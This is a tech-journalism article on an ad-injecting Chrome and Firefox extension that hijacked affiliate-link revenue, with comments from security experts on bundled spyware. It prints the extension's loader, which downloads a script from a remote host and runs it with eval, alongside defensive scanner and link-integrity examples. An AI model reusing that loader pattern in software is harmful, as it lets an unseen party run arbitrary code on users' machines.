Clickjackers: Inside The Strange New World Of Modern Spyware

If you were lucky or, in truth, unlucky enough to download a Chrome and Firefox extension from a site called WeLikeTheWeb.com in 2014 you’d be presented with not much more than a website recommendation engine that you’d probably ignore or uninstall. The app, on its surface, was innocuous. But, if you left it running, you’d be bumping into a fascinating bit of software that points to a new era of spyware that uses your computer in new and nefarious ways and is even sometimes VC-funded.

On the surface, the extension (which most virus scanners now flag as malware and which is effectively dead) brings up pop-ups as you browse. However, if you’re an affiliate marketer – essentially a website creator who makes money by sending customers to pages like booking.com or brazzers.com – you would find lots to hate about WeLikeTheWeb’s WebSiteRecommendation plugin. It is an ad injector, a tool that steers users away from “legitimate” advertisements and injects both images and HTML into your browsing experience. Google estimates that five percent of web users are running ad injectors without knowing it; it’s driving marketers crazy, and it makes for some fascinating code.

Under The Hood

On the surface the plugin is completely mundane. You can look at the code here. It seems to work as advertised, bringing up suggestions as you browse, but dig further into the app and you find some interesting things, starting with one line that invites in a world of hurt.

Take a look at this bit of code:

var website_rec = new function() {
    // consts
    // the remote script that is downloaded and executed every time the extension starts
    this.REMOTE_URL = "http://utils.cdneurope.com/js/link-ff.js";

    // fields
    this.ajaxRequest = null;

    this.init = function() {
        try {
            // Firefox-internal (XPCOM) XMLHttpRequest: this is extension code, not page script
            this.ajaxRequest = Components.classes['@mozilla.org/xmlextras/xmlhttprequest;1'].createInstance(Components.interfaces.nsIXMLHttpRequest);
            this.ajaxRequest.open('GET', this.REMOTE_URL, true);
            // both lines force a fresh download on every run, so the remote file can
            // change the extension's behaviour without the extension itself being updated
            this.ajaxRequest.setRequestHeader('Cache-Control', 'no-cache');
            this.ajaxRequest.channel.loadFlags |= Components.interfaces.nsIRequest.LOAD_BYPASS_CACHE;

            this.ajaxRequest.onreadystatechange = function() {
                try {
                    if (this.readyState == 4 && this.status == 200) {
                        // whatever the server returns is decoded and executed as code
                        eval(unescape(this.responseText));
                    }
                }
                catch (ex) {}
            }
            this.ajaxRequest.send(null);
        } catch(ex) { }
    }

    this.init();
}

The important bit is at the top. You see, the plugin fetches a script hidden on a website called utils.cdneurope.com and runs whatever it gets back with eval.

CDNEurope is a tough nut to crack – tracing it to a geographical source is impossible because the farthest you get is XLHost.com, a hosting company – but it serves up malware in seconds. The domain registrar is hidden and emails to the company remained unanswered.

This code could do anything, and to the average user what it does would be invisible. In fact it’s decidedly difficult to tease out exactly what is going on.
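The loader pattern above (a hard-coded remote URL, a cache bypass, and eval of the response body) is easy to spot statically once you know what to look for. The following is an added example, not code from the article or from the extension it describes: a small Node.js triage script that scans extension source text for those three signals and rates the combination. The regular expressions, function names and both sample sources are constructed for this example.

```javascript
// Added example (not the extension's code): static triage for the
// "download a remote script and eval it" loader pattern. Node.js, no dependencies.

// A quoted URL literal pointing at a remote .js file
const REMOTE_URL_RE = /["']https?:\/\/[^"'\s]+\.js["']/g;
// eval()/new Function() applied, possibly via unescape/decodeURIComponent, to an XHR body
const EVAL_RESPONSE_RE = /\b(?:eval|new\s+Function)\s*\(\s*(?:(?:unescape|decodeURIComponent)\s*\(\s*)?[\w$.]*responseText/;
// Cache bypass: the payload is re-fetched on every run, so it can change at any time
const CACHE_BYPASS_RE = /LOAD_BYPASS_CACHE|Cache-Control["']\s*,\s*["']no-cache/;

// Returns a list of findings ({file, kind, detail}) for one source file.
function scanExtensionSource(file, source) {
  const findings = [];
  for (const literal of source.match(REMOTE_URL_RE) || []) {
    findings.push({ file, kind: 'remote-script-url', detail: literal.slice(1, -1) });
  }
  if (EVAL_RESPONSE_RE.test(source)) {
    findings.push({ file, kind: 'eval-of-network-response', detail: 'eval()/Function() applied to responseText' });
  }
  if (CACHE_BYPASS_RE.test(source)) {
    findings.push({ file, kind: 'cache-bypass', detail: 'remote payload is forced to re-download on every run' });
  }
  return findings;
}

// A remote URL *and* eval of a network response together is the loader pattern;
// either signal alone shows up in plenty of benign code and only merits a look.
function riskLevel(findings) {
  const kinds = new Set(findings.map(f => f.kind));
  if (kinds.has('remote-script-url') && kinds.has('eval-of-network-response')) return 'high';
  return kinds.size > 0 ? 'medium' : 'none';
}

// Constructed sample: the shape of the loader quoted in the article
const LOADER_SOURCE = `
var website_rec = new function() {
  this.REMOTE_URL = "http://utils.cdneurope.com/js/link-ff.js";
  this.init = function() {
    var r = new XMLHttpRequest();
    r.open('GET', this.REMOTE_URL, true);
    r.setRequestHeader('Cache-Control', 'no-cache');
    r.onreadystatechange = function() {
      if (this.readyState == 4 && this.status == 200) { eval(unescape(this.responseText)); }
    };
    r.send(null);
  };
  this.init();
};`;

// Constructed sample: a recommendation feature that only parses JSON data
const BENIGN_SOURCE = `
fetch('https://api.example.invalid/suggest?q=' + encodeURIComponent(q))
  .then(r => r.json())
  .then(items => render(items));`;

for (const [name, src] of [['loader.js', LOADER_SOURCE], ['suggest.js', BENIGN_SOURCE]]) {
  const findings = scanExtensionSource(name, src);
  console.log(name, riskLevel(findings), findings);
}
```

Run over a real extension you would feed every .js file in the package to scanExtensionSource and review anything rated high; the point of the rating is that a remote URL or an eval on its own proves nothing, while the two together are exactly the shape of a loader that can be repointed after install.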

The file, according to VirusTotal, seems to be clean. The code, however, is clearly obfuscated:

[Screenshot: the obfuscated source of the remote link-ff.js script]

This “encryption” – really a packer, a way to reduce the file size and deter casual snooping inside JavaScript files – is trivial to expand into readable code. But what does it do? In this matryoshka doll of code, the real activity is obfuscated a second time and only becomes visible once the code is actually running. Imagine a car whose doors only unlock, allowing you to get in, when it’s going 60 miles per hour. Once you do crack it, however, you find something quite interesting.

Here’s the money shot:

[Screenshot: the unpacked code, showing the affiliate URLs it rewrites]

Notice the URLs. In this particular case, the software changes affiliate links – the codes advertisers embed in their websites to make a little money – on the fly. Instead of an affiliate getting credit for a click to Booking.com, for example, this malware hijacks the link and sends the credit somewhere else. If a customer clicks a link for brazzers.com [NSFW] the malware steps in, sending the advertising money to another user. In short, the Chrome extension is skimming pennies off of everyday web transactions and, in turn, making a fortune.
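Because the rewriting happens inside the visitor's browser, the publisher never sees it on the server; the only place to catch it is in the rendered page. The following is an added example, not code from the article: a Node.js integrity check that takes the href values found in a page and compares the affiliate credit parameter on each merchant link with what the publisher actually deployed. The merchant hosts, parameter names and affiliate IDs are constructed for this example.

```javascript
// Added example (not from the article): detect affiliate links whose credit
// parameter has been swapped or stripped between the server and the screen.

// What the publisher deployed: for each merchant host, the query parameter that
// carries affiliate credit and the value it should hold (all values constructed).
const EXPECTED_AFFILIATES = {
  'www.booking.com': { param: 'aid', value: 'PUB-1234' },
  'shop.example.invalid': { param: 'ref', value: 'pub1234' },
};

// Classify each href as ok, tampered (credit parameter differs or is missing)
// or unknown (not a merchant we have a rule for, or not a parseable URL).
function checkAffiliateLinks(hrefs, expected = EXPECTED_AFFILIATES) {
  const report = { ok: [], tampered: [], unknown: [] };
  for (const href of hrefs) {
    let url;
    try {
      url = new URL(href);
    } catch (e) {
      report.unknown.push({ href, reason: 'unparseable' });
      continue;
    }
    const rule = expected[url.hostname];
    if (!rule) {
      report.unknown.push({ href, reason: 'no rule for host' });
      continue;
    }
    const seen = url.searchParams.get(rule.param); // null when the parameter is gone
    if (seen === rule.value) {
      report.ok.push(href);
    } else {
      report.tampered.push({ href, param: rule.param, expected: rule.value, seen });
    }
  }
  return report;
}

// Constructed sample: the links as the publisher wrote them
const CLEAN_PAGE = [
  'https://www.booking.com/hotel/xx/sample.html?aid=PUB-1234',
  'https://shop.example.invalid/item/42?ref=pub1234',
  'https://www.wikipedia.org/',
];

// Constructed sample: the same page after an injector has rewritten two links
const INJECTED_PAGE = [
  'https://www.booking.com/hotel/xx/sample.html?aid=INJ-9999', // credit swapped
  'https://shop.example.invalid/item/42',                      // credit stripped
  'https://www.wikipedia.org/',
];

// In a browser the input would be Array.from(document.links, a => a.href),
// collected after the page has finished loading so late rewrites are included.
console.log(checkAffiliateLinks(CLEAN_PAGE));
console.log(checkAffiliateLinks(INJECTED_PAGE));
```

Reading the result: a swapped ID shows up with the foreign value in `seen`, and a stripped parameter shows up as `null`; both are reportable, and the hostnames in `tampered` tell you which merchant programmes are being skimmed. Some injectors rewrite the link only at click time rather than at load time, so a thorough check also samples the href at the moment of navigation, not just once after load.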

“There is some very interesting stuff going on which likely is designed to avert any code signing attempts by Google on Chrome plugins that are intended to redirect users to ad sites,” said Matt Harrigan, CEO of Packetsled. “The interesting part is that they seem to be successful, and this doesn’t appear to be exclusive to Chrome. There’s Firefox-specific code in several other files that is further obfuscated from the initial script. We feel that this may lead to a wider-spread problem than just a simple clickjacking.”

Meet The New Boss, Same As The Old Boss

Most of the users of WebSiteRecommendation caught the malware from uTorrent, a torrent downloading program. Even today, a year after WSR seemingly closed shop, uTorrent sometimes still bundles something called MyBrowserBar and recently came under fire for bundling a bit of Bitcoin mining bloatware that later turned out to be a sort of not-for-profit donation system that used spare cycles to raise money for charity. Whatever you call it – malware, bloatware, spyware – the software appears and disappears with alarming regularity, and today’s well-meaning charity application can be tomorrow’s clickjacker.

“Many of today’s more advanced malware includes spyware functionality, but we also see spyware distributed with software bundles,” said Grayson Milbourne, security intelligence director at Webroot. “These come in the form of an installer for a desired application which has been wrapped with a new installer that offers many additional applications. Often referred to as PUAs (potentially unwanted applications), these applications often offer coupons or in some way interact with the web browser. These programs contain EULAs that are very broad and enable them to use the data they observe in any way, often to fuel directed advertising.”

Not all spyware starts off bad. Many apps turn bad once they’re acquired by a less-scrupulous owner. Some apps even turn to the light side of the Force when they’re acquired by a legitimate owner.

“Often this is the result of a spyware company being acquired by a more trustworthy company who changes their practices,” said Milbourne. “When this occurs, the new company will reach out to the AV community to clear their name. This process is often tough to accomplish as there are so many AVs out there and often results in a mix of detection by vendors.”

Experts believe that Peak Spyware happened in 2005, when the Internet was still fairly new. New techniques for nabbing bad guys have made it harder and harder to drive advertising and steal clicks.

“In the years since, Google has basically made ‘spyware’ obsolete, more or less. It certainly isn’t like it once was,” said Sean Sullivan, security advisor for F-Secure. “In 2006, somebody would be baited into downloading a screen saver and without their knowledge, tracking software would be included or installed alongside. These days such tracking software is bundled (crapware) and it is much more a case of buyer beware. In popular use, spyware has come to mean software that actual spies use to spy on suspects/targets. A lot of what we used to call ‘spyware’ is often classified as riskware/monitoring tools or potentially unwanted software.”

The euphemistically named PUAs sound harmless, but they’re still doing real damage – just ask the countless users who found themselves left vulnerable when Lenovo included Superfish in its laptop bloatware. Modern operating systems are getting better at controlling who and what manages your info, but there are still plenty of 0-day hacks that can steal our time, information, and money.


Spyware and PUA writers are getting smarter, our systems are in danger and new tools are being built every day. And there’s money to be made. Randy Abrams, research director at NSS Labs, says that lobbyists are trying to actively prevent anti-spyware regulation, a decidedly scary thought.

“Spyware is ultimately defined by the amount of money spent on lobbying legislators,” said Abrams. “The advertising/marketing industry has extremely deep pockets. There are definitely marketing organizations who do not use [spyware] because they believe these tools and practices cross a legal line. However, this viewpoint is probably not true of most of this industry’s organizations lobbying Congress.”

Researchers are learning about new ways marketers are trying to nail us, and they’re even having a hard time renaming spyware to reflect its changing nature. While many of us would call it malware, researchers are finding new spyware every day that is hidden from the user yet is still a threat.

“People who aren’t careful with the freeware they install will continue to get burned,” said F-Secure’s Sullivan. “There are numerous apps that overreach and threaten privacy. I’ve been trying to think of a new label for more than a year now. But ‘spyware’ just seems to be what people get.”